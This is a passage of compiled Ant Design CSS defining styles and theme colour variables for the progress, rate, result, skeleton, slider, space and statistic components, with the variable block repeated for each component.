cubic-bezier(0.08, 0.82, 0.17, 1) 0s; } .ant-progress-success-bg { position: absolute; top: 0; left: 0; background-color: var(--ant-success-color); } .ant-progress-text { display: inline-block; width: 2em; margin-left: 8px; color: rgba(0, 0, 0, 0.85); font-size: 1em; line-height: 1; white-space: nowrap; text-align: left; vertical-align: middle; word-break: normal; } .ant-progress-text .anticon { font-size: 14px; } .ant-progress-status-active .ant-progress-bg::before { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: #fff; border-radius: 10px; opacity: 0; -webkit-animation: ant-progress-active 2.4s cubic-bezier(0.23, 1, 0.32, 1) infinite; animation: ant-progress-active 2.4s cubic-bezier(0.23, 1, 0.32, 1) infinite; content: ''; } .ant-progress-status-exception .ant-progress-bg { background-color: var(--ant-error-color); } .ant-progress-status-exception .ant-progress-text { color: var(--ant-error-color); } .ant-progress-status-exception .ant-progress-inner:not(.ant-progress-circle-gradient) .ant-progress-circle-path { stroke: var(--ant-error-color); } .ant-progress-status-success .ant-progress-bg { background-color: var(--ant-success-color); } .ant-progress-status-success .ant-progress-text { color: var(--ant-success-color); } .ant-progress-status-success .ant-progress-inner:not(.ant-progress-circle-gradient) .ant-progress-circle-path { stroke: var(--ant-success-color); } .ant-progress-circle .ant-progress-inner { position: relative; line-height: 1; background-color: transparent; } .ant-progress-circle .ant-progress-text { position: absolute; top: 50%; left: 50%; width: 100%; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 1em; line-height: 1; white-space: normal; text-align: center; transform: translate(-50%, -50%); } .ant-progress-circle .ant-progress-text .anticon { font-size: 1.16666667em; } .ant-progress-circle.ant-progress-status-exception .ant-progress-text { color: var(--ant-error-color); } .ant-progress-circle.ant-progress-status-success .ant-progress-text { color: var(--ant-success-color); } @-webkit-keyframes ant-progress-active { 0% { transform: translateX(-100%) scaleX(0); opacity: 0.1; } 20% { transform: translateX(-100%) scaleX(0); opacity: 0.5; } 100% { transform: translateX(0) scaleX(1); opacity: 0; } } @keyframes ant-progress-active { 0% { transform: translateX(-100%) scaleX(0); opacity: 0.1; } 20% { transform: translateX(-100%) scaleX(0); opacity: 0.5; } 100% { transform: translateX(0) scaleX(1); opacity: 0; } } .ant-progress-rtl { direction: rtl; } .ant-progress-rtl.ant-progress-show-info .ant-progress-outer { margin-right: 0; margin-left: calc(-2em - 8px); padding-right: 0; padding-left: calc(2em + 8px); } .ant-progress-rtl .ant-progress-success-bg { right: 0; left: auto; } .ant-progress-rtl.ant-progress-line .ant-progress-text, .ant-progress-rtl.ant-progress-steps .ant-progress-text { margin-right: 8px; margin-left: 0; text-align: right; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-rate { box-sizing: border-box; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; font-feature-settings: 'tnum'; display: inline-block; margin: 0; padding: 0; color: #fadb14; font-size: 20px; line-height: unset; list-style: none; outline: none; } .ant-rate-disabled .ant-rate-star { cursor: default; } .ant-rate-disabled .ant-rate-star:hover { transform: scale(1); } .ant-rate-star { position: relative; display: inline-block; color: inherit; cursor: pointer; } .ant-rate-star:not(:last-child) { margin-right: 8px; } .ant-rate-star > div { transition: all 0.3s, outline 0s; } .ant-rate-star > div:hover, .ant-rate-star > div:focus-visible { transform: scale(1.1); } .ant-rate-star > div:focus { outline: 0; } .ant-rate-star > div:focus-visible { outline: 1px dashed #fadb14; } .ant-rate-star-first, .ant-rate-star-second { color: #f0f0f0; transition: all 0.3s; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-rate-star-first .anticon, .ant-rate-star-second .anticon { vertical-align: middle; } .ant-rate-star-first { position: absolute; top: 0; left: 0; width: 50%; height: 100%; overflow: hidden; opacity: 0; } .ant-rate-star-half .ant-rate-star-first, .ant-rate-star-half .ant-rate-star-second { opacity: 1; } .ant-rate-star-half .ant-rate-star-first, .ant-rate-star-full .ant-rate-star-second { color: inherit; } .ant-rate-text { display: inline-block; margin: 0 8px; font-size: 14px; } .ant-rate-rtl { direction: rtl; } .ant-rate-rtl .ant-rate-star:not(:last-child) { margin-right: 0; margin-left: 8px; } .ant-rate-rtl .ant-rate-star-first { right: 0; left: auto; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-result { padding: 48px 32px; } .ant-result-success .ant-result-icon > .anticon { color: var(--ant-success-color); } .ant-result-error .ant-result-icon > .anticon { color: var(--ant-error-color); } .ant-result-info .ant-result-icon > .anticon { color: var(--ant-info-color); } .ant-result-warning .ant-result-icon > .anticon { color: var(--ant-warning-color); } .ant-result-image { width: 250px; height: 295px; margin: auto; } .ant-result-icon { margin-bottom: 24px; text-align: center; } .ant-result-icon > .anticon { font-size: 72px; } .ant-result-title { color: rgba(0, 0, 0, 0.85); font-size: 24px; line-height: 1.8; text-align: center; } .ant-result-subtitle { color: rgba(0, 0, 0, 0.45); font-size: 14px; line-height: 1.6; text-align: center; } .ant-result-extra { margin: 24px 0 0 0; text-align: center; } .ant-result-extra > * { margin-right: 8px; } .ant-result-extra > *:last-child { margin-right: 0; } .ant-result-content { margin-top: 24px; padding: 24px 40px; background-color: #fafafa; } .ant-result-rtl { direction: rtl; } .ant-result-rtl .ant-result-extra > * { margin-right: 0; margin-left: 8px; } .ant-result-rtl .ant-result-extra > *:last-child { margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-skeleton { display: table; width: 100%; } .ant-skeleton-header { display: table-cell; padding-right: 16px; vertical-align: top; } .ant-skeleton-header .ant-skeleton-avatar { display: inline-block; vertical-align: top; background: rgba(190, 190, 190, 0.2); width: 32px; height: 32px; line-height: 32px; } .ant-skeleton-header .ant-skeleton-avatar.ant-skeleton-avatar-circle { border-radius: 50%; } .ant-skeleton-header .ant-skeleton-avatar-lg { width: 40px; height: 40px; line-height: 40px; } .ant-skeleton-header .ant-skeleton-avatar-lg.ant-skeleton-avatar-circle { border-radius: 50%; } .ant-skeleton-header .ant-skeleton-avatar-sm { width: 24px; height: 24px; line-height: 24px; } .ant-skeleton-header .ant-skeleton-avatar-sm.ant-skeleton-avatar-circle { border-radius: 50%; } .ant-skeleton-content { display: table-cell; width: 100%; vertical-align: top; } .ant-skeleton-content .ant-skeleton-title { width: 100%; height: 16px; margin-top: 16px; background: rgba(190, 190, 190, 0.2); border-radius: 4px; } .ant-skeleton-content .ant-skeleton-title + .ant-skeleton-paragraph { margin-top: 24px; } .ant-skeleton-content .ant-skeleton-paragraph { padding: 0; } .ant-skeleton-content .ant-skeleton-paragraph > li { width: 100%; height: 16px; list-style: none; background: rgba(190, 190, 190, 0.2); border-radius: 4px; } .ant-skeleton-content .ant-skeleton-paragraph > li:last-child:not(:first-child):not(:nth-child(2)) { width: 61%; } .ant-skeleton-content .ant-skeleton-paragraph > li + li { margin-top: 16px; } .ant-skeleton-with-avatar .ant-skeleton-content .ant-skeleton-title { margin-top: 12px; } .ant-skeleton-with-avatar .ant-skeleton-content .ant-skeleton-title + .ant-skeleton-paragraph { margin-top: 28px; } .ant-skeleton-round .ant-skeleton-content .ant-skeleton-title, .ant-skeleton-round .ant-skeleton-content .ant-skeleton-paragraph > li { border-radius: 100px; } .ant-skeleton.ant-skeleton-active .ant-skeleton-content .ant-skeleton-title, .ant-skeleton.ant-skeleton-active .ant-skeleton-content .ant-skeleton-paragraph > li { background: linear-gradient(90deg, rgba(190, 190, 190, 0.2) 25%, rgba(129, 129, 129, 0.24) 37%, rgba(190, 190, 190, 0.2) 63%); background-size: 400% 100%; -webkit-animation: ant-skeleton-loading 1.4s ease infinite; animation: ant-skeleton-loading 1.4s ease infinite; } .ant-skeleton.ant-skeleton-active .ant-skeleton-avatar { background: linear-gradient(90deg, rgba(190, 190, 190, 0.2) 25%, rgba(129, 129, 129, 0.24) 37%, rgba(190, 190, 190, 0.2) 63%); background-size: 400% 100%; -webkit-animation: ant-skeleton-loading 1.4s ease infinite; animation: ant-skeleton-loading 1.4s ease infinite; } .ant-skeleton.ant-skeleton-active .ant-skeleton-button { background: linear-gradient(90deg, rgba(190, 190, 190, 0.2) 25%, rgba(129, 129, 129, 0.24) 37%, rgba(190, 190, 190, 0.2) 63%); background-size: 400% 100%; -webkit-animation: ant-skeleton-loading 1.4s ease infinite; animation: ant-skeleton-loading 1.4s ease infinite; } .ant-skeleton.ant-skeleton-active .ant-skeleton-input { background: linear-gradient(90deg, rgba(190, 190, 190, 0.2) 25%, rgba(129, 129, 129, 0.24) 37%, rgba(190, 190, 190, 0.2) 63%); background-size: 400% 100%; -webkit-animation: ant-skeleton-loading 1.4s ease infinite; animation: ant-skeleton-loading 1.4s ease infinite; } .ant-skeleton.ant-skeleton-active .ant-skeleton-image { background: linear-gradient(90deg, rgba(190, 190, 190, 0.2) 25%, rgba(129, 129, 129, 0.24) 37%, rgba(190, 190, 190, 0.2) 63%); background-size: 400% 100%; -webkit-animation: ant-skeleton-loading 1.4s ease infinite; animation: ant-skeleton-loading 1.4s ease infinite; } .ant-skeleton.ant-skeleton-block { width: 100%; } .ant-skeleton.ant-skeleton-block .ant-skeleton-button { width: 100%; } .ant-skeleton-element { display: inline-block; width: auto; } .ant-skeleton-element .ant-skeleton-button { display: inline-block; vertical-align: top; background: rgba(190, 190, 190, 0.2); border-radius: 2px; width: 64px; min-width: 64px; height: 32px; line-height: 32px; } .ant-skeleton-element .ant-skeleton-button.ant-skeleton-button-circle { width: 32px; min-width: 32px; border-radius: 50%; } .ant-skeleton-element .ant-skeleton-button.ant-skeleton-button-round { border-radius: 32px; } .ant-skeleton-element .ant-skeleton-button-lg { width: 80px; min-width: 80px; height: 40px; line-height: 40px; } .ant-skeleton-element .ant-skeleton-button-lg.ant-skeleton-button-circle { width: 40px; min-width: 40px; border-radius: 50%; } .ant-skeleton-element .ant-skeleton-button-lg.ant-skeleton-button-round { border-radius: 40px; } .ant-skeleton-element .ant-skeleton-button-sm { width: 48px; min-width: 48px; height: 24px; line-height: 24px; } .ant-skeleton-element .ant-skeleton-button-sm.ant-skeleton-button-circle { width: 24px; min-width: 24px; border-radius: 50%; } .ant-skeleton-element .ant-skeleton-button-sm.ant-skeleton-button-round { border-radius: 24px; } .ant-skeleton-element .ant-skeleton-avatar { display: inline-block; vertical-align: top; background: rgba(190, 190, 190, 0.2); width: 32px; height: 32px; line-height: 32px; } .ant-skeleton-element .ant-skeleton-avatar.ant-skeleton-avatar-circle { border-radius: 50%; } .ant-skeleton-element .ant-skeleton-avatar-lg { width: 40px; height: 40px; line-height: 40px; } .ant-skeleton-element .ant-skeleton-avatar-lg.ant-skeleton-avatar-circle { border-radius: 50%; } .ant-skeleton-element .ant-skeleton-avatar-sm { width: 24px; height: 24px; line-height: 24px; } .ant-skeleton-element .ant-skeleton-avatar-sm.ant-skeleton-avatar-circle { border-radius: 50%; } .ant-skeleton-element .ant-skeleton-input { display: inline-block; vertical-align: top; background: rgba(190, 190, 190, 0.2); width: 100%; height: 32px; line-height: 32px; } .ant-skeleton-element .ant-skeleton-input-lg { width: 100%; height: 40px; line-height: 40px; } .ant-skeleton-element .ant-skeleton-input-sm { width: 100%; height: 24px; line-height: 24px; } .ant-skeleton-element .ant-skeleton-image { display: flex; align-items: center; justify-content: center; vertical-align: top; background: rgba(190, 190, 190, 0.2); width: 96px; height: 96px; line-height: 96px; } .ant-skeleton-element .ant-skeleton-image.ant-skeleton-image-circle { border-radius: 50%; } .ant-skeleton-element .ant-skeleton-image-path { fill: #bfbfbf; } .ant-skeleton-element .ant-skeleton-image-svg { width: 48px; height: 48px; line-height: 48px; max-width: 192px; max-height: 192px; } .ant-skeleton-element .ant-skeleton-image-svg.ant-skeleton-image-circle { border-radius: 50%; } @-webkit-keyframes ant-skeleton-loading { 0% { background-position: 100% 50%; } 100% { background-position: 0 50%; } } @keyframes ant-skeleton-loading { 0% { background-position: 100% 50%; } 100% { background-position: 0 50%; } } .ant-skeleton-rtl { direction: rtl; } .ant-skeleton-rtl .ant-skeleton-header { padding-right: 0; padding-left: 16px; } .ant-skeleton-rtl.ant-skeleton.ant-skeleton-active .ant-skeleton-content .ant-skeleton-title, .ant-skeleton-rtl.ant-skeleton.ant-skeleton-active .ant-skeleton-content .ant-skeleton-paragraph > li { -webkit-animation-name: ant-skeleton-loading-rtl; animation-name: ant-skeleton-loading-rtl; } .ant-skeleton-rtl.ant-skeleton.ant-skeleton-active .ant-skeleton-avatar { -webkit-animation-name: ant-skeleton-loading-rtl; animation-name: ant-skeleton-loading-rtl; } @-webkit-keyframes ant-skeleton-loading-rtl { 0% { background-position: 0% 50%; } 100% { background-position: 100% 50%; } } @keyframes ant-skeleton-loading-rtl { 0% { background-position: 0% 50%; } 100% { background-position: 100% 50%; } } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-slider { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; height: 12px; margin: 10px 6px 10px; padding: 4px 0; cursor: pointer; touch-action: none; } .ant-slider-vertical { width: 12px; height: 100%; margin: 6px 10px; padding: 0 4px; } .ant-slider-vertical .ant-slider-rail { width: 4px; height: 100%; } .ant-slider-vertical .ant-slider-track { width: 4px; } .ant-slider-vertical .ant-slider-handle { margin-top: -6px; margin-left: -5px; } .ant-slider-vertical .ant-slider-mark { top: 0; left: 12px; width: 18px; height: 100%; } .ant-slider-vertical .ant-slider-mark-text { left: 4px; white-space: nowrap; } .ant-slider-vertical .ant-slider-step { width: 4px; height: 100%; } .ant-slider-vertical .ant-slider-dot { top: auto; left: 2px; margin-bottom: -4px; } .ant-slider-tooltip .ant-tooltip-inner { min-width: unset; } .ant-slider-rtl.ant-slider-vertical .ant-slider-handle { margin-right: -5px; margin-left: 0; } .ant-slider-rtl.ant-slider-vertical .ant-slider-mark { right: 12px; left: auto; } .ant-slider-rtl.ant-slider-vertical .ant-slider-mark-text { right: 4px; left: auto; } .ant-slider-rtl.ant-slider-vertical .ant-slider-dot { right: 2px; left: auto; } .ant-slider-with-marks { margin-bottom: 28px; } .ant-slider-rail { position: absolute; width: 100%; height: 4px; background-color: #f5f5f5; border-radius: 2px; transition: background-color 0.3s; } .ant-slider-track { position: absolute; height: 4px; background-color: var(--ant-primary-3); border-radius: 2px; transition: background-color 0.3s; } .ant-slider-handle { position: absolute; width: 14px; height: 14px; margin-top: -5px; background-color: #fff; border: solid 2px var(--ant-primary-3); border-radius: 50%; box-shadow: 0; cursor: pointer; transition: border-color 0.3s, box-shadow 0.6s, transform 0.3s cubic-bezier(0.18, 0.89, 0.32, 1.28); } .ant-slider-handle-dragging.ant-slider-handle-dragging.ant-slider-handle-dragging { border-color: var(--ant-primary-color-deprecated-t-20); box-shadow: 0 0 0 5px var(--ant-primary-color-deprecated-f-12); } .ant-slider-handle:focus { border-color: var(--ant-primary-color-deprecated-t-20); outline: none; box-shadow: 0 0 0 5px var(--ant-primary-color-deprecated-f-12); } .ant-slider-handle.ant-tooltip-open { border-color: var(--ant-primary-color); } .ant-slider:hover .ant-slider-rail { background-color: #e1e1e1; } .ant-slider:hover .ant-slider-track { background-color: var(--ant-primary-4); } .ant-slider:hover .ant-slider-handle:not(.ant-tooltip-open) { border-color: var(--ant-primary-4); } .ant-slider-mark { position: absolute; top: 14px; left: 0; width: 100%; font-size: 14px; } .ant-slider-mark-text { position: absolute; display: inline-block; color: rgba(0, 0, 0, 0.45); text-align: center; word-break: keep-all; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-slider-mark-text-active { color: rgba(0, 0, 0, 0.85); } .ant-slider-step { position: absolute; width: 100%; height: 4px; background: transparent; } .ant-slider-dot { position: absolute; top: -2px; width: 8px; height: 8px; margin-left: -4px; background-color: #fff; border: 2px solid #f0f0f0; border-radius: 50%; cursor: pointer; } .ant-slider-dot:first-child { margin-left: -4px; } .ant-slider-dot:last-child { margin-left: -4px; } .ant-slider-dot-active { border-color: var(--ant-primary-color-deprecated-t-50); } .ant-slider-disabled { cursor: not-allowed; } .ant-slider-disabled .ant-slider-rail { background-color: #f5f5f5 !important; } .ant-slider-disabled .ant-slider-track { background-color: rgba(0, 0, 0, 0.25) !important; } .ant-slider-disabled .ant-slider-handle, .ant-slider-disabled .ant-slider-dot { background-color: #fff; border-color: rgba(0, 0, 0, 0.25) !important; box-shadow: none; cursor: not-allowed; } .ant-slider-disabled .ant-slider-mark-text, .ant-slider-disabled .ant-slider-dot { cursor: not-allowed !important; } .ant-slider-rtl { direction: rtl; } .ant-slider-rtl .ant-slider-mark { right: 0; left: auto; } .ant-slider-rtl .ant-slider-dot { margin-right: -4px; margin-left: 0; } .ant-slider-rtl .ant-slider-dot:first-child { margin-right: -4px; margin-left: 0; } .ant-slider-rtl .ant-slider-dot:last-child { margin-right: -4px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-space { display: inline-flex; } .ant-space-vertical { flex-direction: column; } .ant-space-align-center { align-items: center; } .ant-space-align-start { align-items: flex-start; } .ant-space-align-end { align-items: flex-end; } .ant-space-align-baseline { align-items: baseline; } .ant-space-item:empty { display: none; } .ant-space-rtl { direction: rtl; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-statistic { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; } .ant-statistic-title { margin-bottom: 4px; color: rgba(0, 0, 0, 0.45); font-size: 14px; } .ant-statistic-content { color: rgba(0, 0, 0, 0.85); font-size: 24px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, 'Noto Sans', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol', 'Noto Color Emoji'; } .ant-statistic-content-value { display: inline-block; direction: ltr; } .ant-statistic-content-prefix, .ant-statistic-content-suffix { display: inline-block; } .ant-statistic-content-prefix { margin-right: 4px; } .ant-statistic-content-suffix { margin-left: 4px; } .ant-statistic-rtl { direction: rtl; } .ant-statistic-rtl .ant-statistic-content-prefix { margin-right: 0; margin-left: 4px; } .ant-statistic-rtl .ant-statistic-content-suffix { margin-right: 4px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: 